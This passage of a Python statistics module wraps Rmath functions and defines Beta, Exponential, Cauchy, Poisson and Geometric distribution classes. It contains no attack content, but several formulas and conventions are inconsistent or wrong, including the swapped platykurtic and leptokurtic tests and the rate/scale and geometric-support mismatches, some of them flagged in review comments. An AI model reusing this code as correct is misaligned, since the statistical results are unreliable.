        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return gamma_ccdf(self.alpha, self.beta, x)
    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return gamma_logcdf(self.alpha, self.beta, x)
    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return gamma_logccdf(self.alpha, self.beta, x)
    def quantile(self, q):
        """The quantile value evaluated at q."""
        return gamma_invcdf(self.alpha, self.beta, q)
    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return gamma_invccdf(self.alpha, self.beta, q)
    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return gamma_invlogcdf(self.alpha, self.beta, lq)
    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return gamma_invlogccdf(self.alpha, self.beta, lq)
    # ========
    # Sampling
    # ========
    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        for i, _ in np.ndenumerate(out):
            out[i] = gamma_rand(self.alpha, self.beta)
        return out
# ============================= NEW DISTRIBUTION =================================
# Beta: numba-vectorized wrappers around Rmath dbeta/pbeta/qbeta.
# Trailing int arguments follow the Rmath convention: `lower_tail`, `log_p`.
# (The parameter named `beta` here is local; it shadows the module-level
# `beta` special function only inside these wrappers.)
dbeta = _rmath_ffi.lib.dbeta
pbeta = _rmath_ffi.lib.pbeta
qbeta = _rmath_ffi.lib.qbeta
@vectorize(nopython=True)
def beta_pdf(alpha, beta, x):
    return dbeta(x, alpha, beta, 0)
@vectorize(nopython=True)
def beta_logpdf(alpha, beta, x):
    return dbeta(x, alpha, beta, 1)
@vectorize(nopython=True)
def beta_cdf(alpha, beta, x):
    return pbeta(x, alpha, beta, 1, 0)
@vectorize(nopython=True)
def beta_ccdf(alpha, beta, x):
    return pbeta(x, alpha, beta, 0, 0)
@vectorize(nopython=True)
def beta_logcdf(alpha, beta, x):
    return pbeta(x, alpha, beta, 1, 1)
@vectorize(nopython=True)
def beta_logccdf(alpha, beta, x):
    return pbeta(x, alpha, beta, 0, 1)
@vectorize(nopython=True)
def beta_invcdf(alpha, beta, q):
    return qbeta(q, alpha, beta, 1, 0)
@vectorize(nopython=True)
def beta_invccdf(alpha, beta, q):
    return qbeta(q, alpha, beta, 0, 0)
@vectorize(nopython=True)
def beta_invlogcdf(alpha, beta, lq):
    return qbeta(lq, alpha, beta, 1, 1)
@vectorize(nopython=True)
def beta_invlogccdf(alpha, beta, lq):
    return qbeta(lq, alpha, beta, 0, 1)
rbeta = _rmath_ffi.lib.rbeta
@jit(nopython=True)
def beta_rand(alpha, beta):
    # one draw using Rmath's RNG state
    return rbeta(alpha, beta)
@vectorize(nopython=True)
def beta_mgf(alpha, beta, x):
    # The Beta MGF (a confluent hypergeometric function) is not implemented.
    # NOTE(review): returning None from a nopython-vectorized function looks
    # dubious -- confirm this is never actually evaluated.
    return None
@vectorize(nopython=True)
def beta_cf(alpha, beta, x):
    # Not implemented.
    return None
# -------------
# Beta
# -------------
spec = [
    ('alpha', float32), ('beta', float32)
]
@jitclass(spec)
class Beta():
    # Beta distribution on (0, 1) with shape parameters alpha and beta.
    # set docstring
    __doc__ = _create_class_docstr(**mtdt['Beta'])
    def __init__(self, alpha, beta):
        self.alpha, self.beta = alpha, beta
    def __str__(self):
        return "Beta(alpha=%.5f, beta=%.5f)" %(self.params)
    def __repr__(self):
        return self.__str__()
    # ===================
    # Parameter retrieval
    # ===================
    @property
    def params(self):
        """Return a tuple of parameters."""
        return (self.alpha, self.beta)
    @property
    def location(self):
        """Return location parameter if exists."""
        return None
    @property
    def scale(self):
        """Return scale parameter if exists."""
        return None
    @property
    def shape(self):
        """Return shape parameter if exists."""
        return (self.alpha, self.beta)
    # ==========
    # Statistics
    # ==========
    @property
    def mean(self):
        """Return the mean."""
        return self.alpha/(self.alpha + self.beta)
    @property
    def median(self):
        """Return the median."""
        # (alpha - 1/3)/(alpha + beta - 2/3) is the standard closed-form
        # *approximation* to the Beta median, used only for alpha, beta >= 1.
        return (self.alpha - 1/3)/(self.alpha + self.beta - 2/3) if self.alpha >=1 and self.beta >= 1 else None
    @property
    def mode(self):
        """Return the mode."""
        # interior mode exists only when both shapes exceed 1
        return (self.alpha - 1)/(self.alpha + self.beta - 2) if self.alpha > 1 and self.beta > 1 else None
    @property
    def var(self):
        """Return the variance."""
        return (self.alpha * self.beta)/ ((self.alpha + self.beta)**2 * (self.alpha + self.beta + 1))
    @property
    def std(self):
        """Return the standard deviation."""
        return np.sqrt(self.var)
    @property
    def skewness(self):
        """Return the skewness."""
        return 2 * (self.beta - self.alpha) * np.sqrt(self.alpha + self.beta + 1)/ ((self.alpha + self.beta + 2) * np.sqrt(self.alpha * self.beta))
    @property
    def kurtosis(self):
        """Return the kurtosis."""
        # full kurtosis (3 + excess)
        return 3 + 6 * ((self.alpha - self.beta)**2*(self.alpha + self.beta + 1) - self.alpha * self.beta * (self.alpha + self.beta + 2) )/ (self.alpha * self.beta * (self.alpha + self.beta + 2) * (self.alpha + self.beta + 3))
    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        return self.kurtosis > 0
    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0
    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0
    @property
    def entropy(self):
        """Return the entropy."""
        # ln B(a,b) - (a-1)psi(a) - (b-1)psi(b) + (a+b-2)psi(a+b);
        # `beta` here is the module-level Beta special function.
        return np.log(beta(self.alpha, self.beta)) - (self.alpha - 1)* digamma(self.alpha) - (self.beta - 1)*digamma(self.beta) + (self.alpha + self.beta - 2)*digamma(self.alpha + self.beta)
    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return beta_mgf(self.alpha, self.beta, x)
    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return beta_cf(self.alpha, self.beta, x)
    # ==========
    # Evaluation
    # ==========
    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        return 0 < x < 1
    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return beta_pdf(self.alpha, self.beta, x)
    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return beta_logpdf(self.alpha, self.beta, x)
    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(beta_logpdf(self.alpha, self.beta, x))
    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return beta_cdf(self.alpha, self.beta, x)
    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return beta_ccdf(self.alpha, self.beta, x)
    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return beta_logcdf(self.alpha, self.beta, x)
    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return beta_logccdf(self.alpha, self.beta, x)
    def quantile(self, q):
        """The quantile value evaluated at q."""
        return beta_invcdf(self.alpha, self.beta, q)
    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return beta_invccdf(self.alpha, self.beta, q)
    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return beta_invlogcdf(self.alpha, self.beta, lq)
    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return beta_invlogccdf(self.alpha, self.beta, lq)
    # ========
    # Sampling
    # ========
    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        for i, _ in np.ndenumerate(out):
            out[i] = beta_rand(self.alpha, self.beta)
        return out
# ============================= NEW DISTRIBUTION =================================
# Exponential: numba-vectorized wrappers around Rmath dexp/pexp/qexp.
# Trailing int arguments follow the Rmath convention: `lower_tail`, `log_p`.
# NOTE(review): Rmath's exponential routines take a *scale* parameter, while
# the Exponential class below treats `theta` as a *rate* (mean = 1/theta,
# mgf = theta/(theta - x)) -- verify the intended convention.
dexp = _rmath_ffi.lib.dexp
pexp = _rmath_ffi.lib.pexp
qexp = _rmath_ffi.lib.qexp
@vectorize(nopython=True)
def exp_pdf(theta, x):
    return dexp(x, theta, 0)
@vectorize(nopython=True)
def exp_logpdf(theta, x):
    return dexp(x, theta, 1)
@vectorize(nopython=True)
def exp_cdf(theta, x):
    return pexp(x, theta, 1, 0)
@vectorize(nopython=True)
def exp_ccdf(theta, x):
    return pexp(x, theta, 0, 0)
@vectorize(nopython=True)
def exp_logcdf(theta, x):
    return pexp(x, theta, 1, 1)
@vectorize(nopython=True)
def exp_logccdf(theta, x):
    return pexp(x, theta, 0, 1)
@vectorize(nopython=True)
def exp_invcdf(theta, q):
    return qexp(q, theta, 1, 0)
@vectorize(nopython=True)
def exp_invccdf(theta, q):
    return qexp(q, theta, 0, 0)
@vectorize(nopython=True)
def exp_invlogcdf(theta, lq):
    return qexp(lq, theta, 1, 1)
@vectorize(nopython=True)
def exp_invlogccdf(theta, lq):
    return qexp(lq, theta, 0, 1)
rexp = _rmath_ffi.lib.rexp
@jit(nopython=True)
def exp_rand(theta):
    # one draw using Rmath's RNG state
    return rexp(theta)
@vectorize(nopython=True)
def exp_mgf(theta, x):
    # MGF for rate theta, defined only for x < theta.
    # NOTE(review): returning None from a nopython-vectorized function looks
    # dubious -- confirm the x >= theta branch is never actually evaluated.
    return theta/(theta - x) if x < theta else None
@vectorize(nopython=True)
def exp_cf(theta, x):
    # characteristic function for rate theta
    return theta/(theta - 1j*x)
# -------------
# Exponential
# -------------
spec = [
    ('theta', float32)
]
@jitclass(spec)
class Exponential():
    # Exponential distribution with rate `theta` (mean = 1/theta).
    # set docstring
    __doc__ = _create_class_docstr(**mtdt['Exponential'])
    def __init__(self, theta):
        self.theta = theta
    def __str__(self):
        return "Exponential(theta=%.5f)" %(self.params)
    def __repr__(self):
        return self.__str__()
    # ===================
    # Parameter retrieval
    # ===================
    @property
    def params(self):
        """Return a tuple of parameters."""
        # Fixed: previously returned the bare scalar `(self.theta)`; a
        # one-element tuple matches the docstring and the other classes.
        return (self.theta,)
    @property
    def location(self):
        """Return location parameter if exists."""
        return None
    @property
    def scale(self):
        """Return scale parameter if exists."""
        return 1/self.theta
    @property
    def shape(self):
        """Return shape parameter if exists."""
        return None
    # ==========
    # Statistics
    # ==========
    @property
    def mean(self):
        """Return the mean."""
        return 1/self.theta
    @property
    def median(self):
        """Return the median."""
        return 1/self.theta * np.log(2)
    @property
    def mode(self):
        """Return the mode."""
        return 0
    @property
    def var(self):
        """Return the variance."""
        return self.theta**(-2)
    @property
    def std(self):
        """Return the standard deviation."""
        return np.sqrt(self.var)
    @property
    def skewness(self):
        """Return the skewness."""
        return 2
    @property
    def kurtosis(self):
        """Return the kurtosis."""
        # full kurtosis (3 + excess of 6)
        return 9
    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        return self.kurtosis > 0
    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0
    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0
    @property
    def entropy(self):
        """Return the entropy."""
        return 1 - np.log(self.theta)
    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return exp_mgf(self.theta, x)
    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return exp_cf(self.theta, x)
    # ==========
    # Evaluation
    # ==========
    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        return 0 <= x < np.inf
    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return exp_pdf(self.theta, x)
    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return exp_logpdf(self.theta, x)
    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(exp_logpdf(self.theta, x))
    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return exp_cdf(self.theta, x)
    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return exp_ccdf(self.theta, x)
    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return exp_logcdf(self.theta, x)
    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return exp_logccdf(self.theta, x)
    def quantile(self, q):
        """The quantile value evaluated at q."""
        return exp_invcdf(self.theta, q)
    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return exp_invccdf(self.theta, q)
    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return exp_invlogcdf(self.theta, lq)
    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return exp_invlogccdf(self.theta, lq)
    # ========
    # Sampling
    # ========
    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        for i, _ in np.ndenumerate(out):
            out[i] = exp_rand(self.theta)
        return out
# ============================= NEW DISTRIBUTION =================================
# Cauchy: numba-vectorized wrappers around Rmath dcauchy/pcauchy/qcauchy with
# location `mu` and scale `sigma`.
# Trailing int arguments follow the Rmath convention: `lower_tail`, `log_p`.
dcauchy = _rmath_ffi.lib.dcauchy
pcauchy = _rmath_ffi.lib.pcauchy
qcauchy = _rmath_ffi.lib.qcauchy
@vectorize(nopython=True)
def cauchy_pdf(mu, sigma, x):
    return dcauchy(x, mu, sigma, 0)
@vectorize(nopython=True)
def cauchy_logpdf(mu, sigma, x):
    return dcauchy(x, mu, sigma, 1)
@vectorize(nopython=True)
def cauchy_cdf(mu, sigma, x):
    return pcauchy(x, mu, sigma, 1, 0)
@vectorize(nopython=True)
def cauchy_ccdf(mu, sigma, x):
    return pcauchy(x, mu, sigma, 0, 0)
@vectorize(nopython=True)
def cauchy_logcdf(mu, sigma, x):
    return pcauchy(x, mu, sigma, 1, 1)
@vectorize(nopython=True)
def cauchy_logccdf(mu, sigma, x):
    return pcauchy(x, mu, sigma, 0, 1)
@vectorize(nopython=True)
def cauchy_invcdf(mu, sigma, q):
    return qcauchy(q, mu, sigma, 1, 0)
@vectorize(nopython=True)
def cauchy_invccdf(mu, sigma, q):
    return qcauchy(q, mu, sigma, 0, 0)
@vectorize(nopython=True)
def cauchy_invlogcdf(mu, sigma, lq):
    return qcauchy(lq, mu, sigma, 1, 1)
@vectorize(nopython=True)
def cauchy_invlogccdf(mu, sigma, lq):
    return qcauchy(lq, mu, sigma, 0, 1)
rcauchy = _rmath_ffi.lib.rcauchy
@jit(nopython=True)
def cauchy_rand(mu, sigma):
    # one draw using Rmath's RNG state
    return rcauchy(mu, sigma)
@vectorize(nopython=True)
def cauchy_mgf(mu, sigma, x):
    # The Cauchy distribution has no moment generating function.
    # NOTE(review): returning None from a nopython-vectorized function looks
    # dubious -- confirm this is never actually evaluated.
    return None
@vectorize(nopython=True)
def cauchy_cf(mu, sigma, x):
    # characteristic function: exp(i*mu*t - sigma*|t|)
    return np.exp(mu*1j*x - sigma*np.abs(x))
# -------------
# Cauchy
# -------------

# numba jitclass field specification: both parameters stored as float32.
spec = [
    ('mu', float32), ('sigma', float32)
]


@jitclass(spec)
class Cauchy():
    # set docstring
    __doc__ = _create_class_docstr(**mtdt['Cauchy'])

    def __init__(self, mu, sigma):
        # mu: location parameter; sigma: scale parameter (assumed > 0).
        self.mu, self.sigma = mu, sigma

    def __str__(self):
        return "Cauchy(mu=%.5f, sigma=%.5f)" %(self.params)

    def __repr__(self):
        return self.__str__()

    # ===================
    # Parameter retrieval
    # ===================

    @property
    def params(self):
        """Return a tuple of parameters."""
        return (self.mu, self.sigma)

    @property
    def location(self):
        """Return location parameter if exists."""
        return self.mu

    @property
    def scale(self):
        """Return scale parameter if exists."""
        return self.sigma

    @property
    def shape(self):
        """Return shape parameter if exists."""
        return None

    # ==========
    # Statistics
    # ==========

    @property
    def mean(self):
        """Return the mean."""
        # The Cauchy mean is undefined.
        return None

    @property
    def median(self):
        """Return the median."""
        return self.mu

    @property
    def mode(self):
        """Return the mode."""
        return self.mu

    @property
    def var(self):
        """Return the variance."""
        # The Cauchy variance is undefined.
        return None

    @property
    def std(self):
        """Return the standard deviation."""
        # Undefined, like the variance.
        return None

    @property
    def skewness(self):
        """Return the skewness."""
        # Undefined for the Cauchy distribution.
        return None

    @property
    def kurtosis(self):
        """Return the kurtosis."""
        # NOTE(review): the Cauchy kurtosis is undefined; this returns 0
        # while mean/var/skewness return None -- confirm intent.
        return 0

    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        return self.kurtosis > 0

    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0

    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0

    @property
    def entropy(self):
        """Return the entropy."""
        # Differential entropy of Cauchy: log(4*pi*sigma).
        return np.log(self.sigma) + np.log(4*np.pi)

    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return cauchy_mgf(self.mu, self.sigma, x)

    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return cauchy_cf(self.mu, self.sigma, x)

    # ==========
    # Evaluation
    # ==========

    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        # Support is the whole real line.
        return -np.inf < x < np.inf

    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return cauchy_pdf(self.mu, self.sigma, x)

    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return cauchy_logpdf(self.mu, self.sigma, x)

    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(cauchy_logpdf(self.mu, self.sigma, x))

    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return cauchy_cdf(self.mu, self.sigma, x)

    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return cauchy_ccdf(self.mu, self.sigma, x)

    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return cauchy_logcdf(self.mu, self.sigma, x)

    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return cauchy_logccdf(self.mu, self.sigma, x)

    def quantile(self, q):
        """The quantile value evaluated at q."""
        return cauchy_invcdf(self.mu, self.sigma, q)

    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return cauchy_invccdf(self.mu, self.sigma, q)

    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return cauchy_invlogcdf(self.mu, self.sigma, lq)

    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return cauchy_invlogccdf(self.mu, self.sigma, lq)

    # ========
    # Sampling
    # ========

    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        # ndenumerate keeps the loop nopython-friendly while filling in place.
        for i, _ in np.ndenumerate(out):
            out[i] = cauchy_rand(self.mu, self.sigma)
        return out
# ============================= NEW DISTRIBUTION =================================

# Raw Rmath C entry points for the Poisson distribution (via CFFI).
# Flag conventions (see Rmath): trailing args are give_log for d*,
# (lower_tail, log_p) for p*/q*.
dpois = _rmath_ffi.lib.dpois
ppois = _rmath_ffi.lib.ppois
qpois = _rmath_ffi.lib.qpois


@vectorize(nopython=True)
def pois_pdf(mu, x):
    """Poisson pmf at x for rate mu."""
    return dpois(x, mu, 0)


@vectorize(nopython=True)
def pois_logpdf(mu, x):
    """Log of the Poisson pmf at x."""
    return dpois(x, mu, 1)


@vectorize(nopython=True)
def pois_cdf(mu, x):
    """Poisson CDF P(X <= x)."""
    return ppois(x, mu, 1, 0)


@vectorize(nopython=True)
def pois_ccdf(mu, x):
    """Poisson complementary CDF P(X > x)."""
    return ppois(x, mu, 0, 0)


@vectorize(nopython=True)
def pois_logcdf(mu, x):
    """Log of the Poisson CDF."""
    return ppois(x, mu, 1, 1)


@vectorize(nopython=True)
def pois_logccdf(mu, x):
    """Log of the Poisson complementary CDF."""
    return ppois(x, mu, 0, 1)


@vectorize(nopython=True)
def pois_invcdf(mu, q):
    """Poisson quantile function at q."""
    return qpois(q, mu, 1, 0)


@vectorize(nopython=True)
def pois_invccdf(mu, q):
    """Poisson complementary quantile at q."""
    return qpois(q, mu, 0, 0)


@vectorize(nopython=True)
def pois_invlogcdf(mu, lq):
    """Inverse of the log-CDF."""
    return qpois(lq, mu, 1, 1)


@vectorize(nopython=True)
def pois_invlogccdf(mu, lq):
    """Inverse of the log-CCDF."""
    return qpois(lq, mu, 0, 1)


rpois = _rmath_ffi.lib.rpois


@jit(nopython=True)
def pois_rand(mu):
    """Draw a single Poisson(mu) variate from Rmath's RNG."""
    return rpois(mu)


@vectorize(nopython=True)
def pois_mgf(mu, x):
    """Poisson MGF: exp(mu*(e^x - 1))."""
    return np.exp(mu*(np.exp(x) - 1))


@vectorize(nopython=True)
def pois_cf(mu, x):
    """Poisson characteristic function: exp(mu*(e^{ix} - 1))."""
    return np.exp(mu*(np.exp(1j*x) - 1))
# -------------
# Poisson
# -------------

# numba jitclass field specification: rate parameter stored as float32.
spec = [
    ('mu', float32)
]


@jitclass(spec)
class Poisson():
    # set docstring
    __doc__ = _create_class_docstr(**mtdt['Poisson'])

    def __init__(self, mu):
        # mu: rate parameter (expected count); assumed positive.
        self.mu = mu

    def __str__(self):
        return "Poisson(mu=%.5f)" %(self.params)

    def __repr__(self):
        return self.__str__()

    # ===================
    # Parameter retrieval
    # ===================

    @property
    def params(self):
        """Return a tuple of parameters."""
        # Fixed: a one-element tuple needs the trailing comma; previously
        # this returned the bare scalar mu despite the documented contract.
        return (self.mu,)

    @property
    def location(self):
        """Return location parameter if exists."""
        return None

    @property
    def scale(self):
        """Return scale parameter if exists."""
        return None

    @property
    def shape(self):
        """Return shape parameter if exists."""
        return self.mu

    # ==========
    # Statistics
    # ==========

    @property
    def mean(self):
        """Return the mean."""
        return self.mu

    @property
    def median(self):
        """Return the median."""
        # Standard closed-form approximation: floor(mu + 1/3 - 0.02/mu).
        return np.floor(self.mu + 1/3 - 0.02/self.mu)

    @property
    def mode(self):
        """Return the mode."""
        # The two values coincide unless mu is an integer, in which case the
        # distribution is bimodal at mu-1 and mu.
        return (np.ceil(self.mu) - 1, np.floor(self.mu))

    @property
    def var(self):
        """Return the variance."""
        return self.mu

    @property
    def std(self):
        """Return the standard deviation."""
        return np.sqrt(self.var)

    @property
    def skewness(self):
        """Return the skewness."""
        # Fixed: Poisson skewness is mu**(-1/2) = 1/sqrt(mu);
        # previously this returned mu**(1/2).
        return self.mu**(-.5)

    @property
    def kurtosis(self):
        """Return the kurtosis."""
        # NOTE(review): 1/mu is the *excess* kurtosis; some sibling classes
        # (e.g. Binomial) return the full kurtosis instead -- confirm the
        # intended convention file-wide.
        return 1/self.mu

    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        return self.kurtosis > 0

    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0

    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0

    @property
    def entropy(self):
        """Return the entropy."""
        # Asymptotic expansion of the Poisson entropy in powers of 1/mu;
        # accurate for moderately large mu.
        return .5*np.log(2*np.pi*np.e*self.mu) - 1/(12*self.mu) - 1/(24*self.mu**2) - 19/(360*self.mu**3)

    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return pois_mgf(self.mu, x)

    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return pois_cf(self.mu, x)

    # ==========
    # Evaluation
    # ==========

    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        # NOTE(review): accepts any int, including negatives, although the
        # Poisson support is the non-negative integers -- confirm intent.
        return isinstance(x, int)

    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return pois_pdf(self.mu, x)

    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return pois_logpdf(self.mu, x)

    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(pois_logpdf(self.mu, x))

    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return pois_cdf(self.mu, x)

    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return pois_ccdf(self.mu, x)

    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return pois_logcdf(self.mu, x)

    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return pois_logccdf(self.mu, x)

    def quantile(self, q):
        """The quantile value evaluated at q."""
        return pois_invcdf(self.mu, q)

    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return pois_invccdf(self.mu, q)

    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return pois_invlogcdf(self.mu, lq)

    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return pois_invlogccdf(self.mu, lq)

    # ========
    # Sampling
    # ========

    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        # ndenumerate keeps the loop nopython-friendly while filling in place.
        for i, _ in np.ndenumerate(out):
            out[i] = pois_rand(self.mu)
        return out
# ============================= NEW DISTRIBUTION =================================

# Raw Rmath C entry points for the geometric distribution (via CFFI).
# NOTE(review): Rmath's geometric counts *failures before the first success*
# (support {0, 1, ...}); the Geometric class below documents trial-counting
# moments (mean 1/p, mode 1) -- confirm which convention is intended.
dgeom = _rmath_ffi.lib.dgeom
pgeom = _rmath_ffi.lib.pgeom
qgeom = _rmath_ffi.lib.qgeom


@vectorize(nopython=True)
def geom_pdf(p, x):
    """Geometric pmf at x for success probability p."""
    return dgeom(x, p, 0)


@vectorize(nopython=True)
def geom_logpdf(p, x):
    """Log of the geometric pmf at x."""
    return dgeom(x, p, 1)


@vectorize(nopython=True)
def geom_cdf(p, x):
    """Geometric CDF P(X <= x)."""
    return pgeom(x, p, 1, 0)


@vectorize(nopython=True)
def geom_ccdf(p, x):
    """Geometric complementary CDF P(X > x)."""
    return pgeom(x, p, 0, 0)


@vectorize(nopython=True)
def geom_logcdf(p, x):
    """Log of the geometric CDF."""
    return pgeom(x, p, 1, 1)


@vectorize(nopython=True)
def geom_logccdf(p, x):
    """Log of the geometric complementary CDF."""
    return pgeom(x, p, 0, 1)


@vectorize(nopython=True)
def geom_invcdf(p, q):
    """Geometric quantile function at q."""
    return qgeom(q, p, 1, 0)


@vectorize(nopython=True)
def geom_invccdf(p, q):
    """Geometric complementary quantile at q."""
    return qgeom(q, p, 0, 0)


@vectorize(nopython=True)
def geom_invlogcdf(p, lq):
    """Inverse of the log-CDF."""
    return qgeom(lq, p, 1, 1)


@vectorize(nopython=True)
def geom_invlogccdf(p, lq):
    """Inverse of the log-CCDF."""
    return qgeom(lq, p, 0, 1)


rgeom = _rmath_ffi.lib.rgeom


@jit(nopython=True)
def geom_rand(p):
    """Draw a single geometric variate from Rmath's RNG."""
    return rgeom(p)


@vectorize(nopython=True)
def geom_mgf(p, x):
    # MGF exists only for x < -log(1-p); None is returned otherwise.
    # NOTE(review): returning None from a nopython vectorize is unlikely to
    # compile if that branch is ever taken -- confirm intended behavior.
    return p*np.exp(x)/(1 - (1 - p)*np.exp(x)) if x < -np.log(1-p) else None


@vectorize(nopython=True)
def geom_cf(p, x):
    """Geometric characteristic function."""
    return p*np.exp(x*1j)/(1 - (1 - p)*np.exp(x*1j))
# -------------
# Geometric
# -------------

# numba jitclass field specification: success probability stored as float32.
spec = [
    ('p', float32)
]


@jitclass(spec)
class Geometric():
    # set docstring
    __doc__ = _create_class_docstr(**mtdt['Geometric'])

    def __init__(self, p):
        # p: success probability, 0 < p <= 1.
        self.p = p

    def __str__(self):
        return "Geometric(p=%.5f)" %(self.params)

    def __repr__(self):
        return self.__str__()

    # ===================
    # Parameter retrieval
    # ===================

    @property
    def params(self):
        """Return a tuple of parameters."""
        # Fixed: a one-element tuple needs the trailing comma; previously
        # this returned the bare scalar p despite the documented contract.
        return (self.p,)

    @property
    def location(self):
        """Return location parameter if exists."""
        return None

    @property
    def scale(self):
        """Return scale parameter if exists."""
        return None

    @property
    def shape(self):
        """Return shape parameter if exists."""
        return None

    # ==========
    # Statistics
    # ==========

    @property
    def mean(self):
        """Return the mean."""
        # Trial-counting convention (support {1, 2, ...}).
        # NOTE(review): Rmath's geom counts failures (mean (1-p)/p) --
        # confirm consistency with pdf/cdf/rand.
        return 1/self.p

    @property
    def median(self):
        """Return the median."""
        return np.ceil(-1/(np.log2(1-self.p)))

    @property
    def mode(self):
        """Return the mode."""
        return 1

    @property
    def var(self):
        """Return the variance."""
        return (1 - self.p)/(self.p**2)

    @property
    def std(self):
        """Return the standard deviation."""
        return np.sqrt(self.var)

    @property
    def skewness(self):
        """Return the skewness."""
        return (2 - self.p)/(np.sqrt(1 - self.p))

    @property
    def kurtosis(self):
        """Return the kurtosis."""
        # Fixed: full kurtosis is 3 + excess = 3 + (6 + p^2/(1-p));
        # previously this computed 9 + p/(1-p)^2.
        return 9 + self.p**2/(1 - self.p)

    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        return self.kurtosis > 0

    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0

    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0

    @property
    def entropy(self):
        """Return the entropy."""
        # Shannon entropy: (-(1-p)log2(1-p) - p log2(p)) / p.
        return (-(1 - self.p)*np.log2(1 - self.p) - self.p*np.log2(self.p))/self.p

    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return geom_mgf(self.p, x)

    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return geom_cf(self.p, x)

    # ==========
    # Evaluation
    # ==========

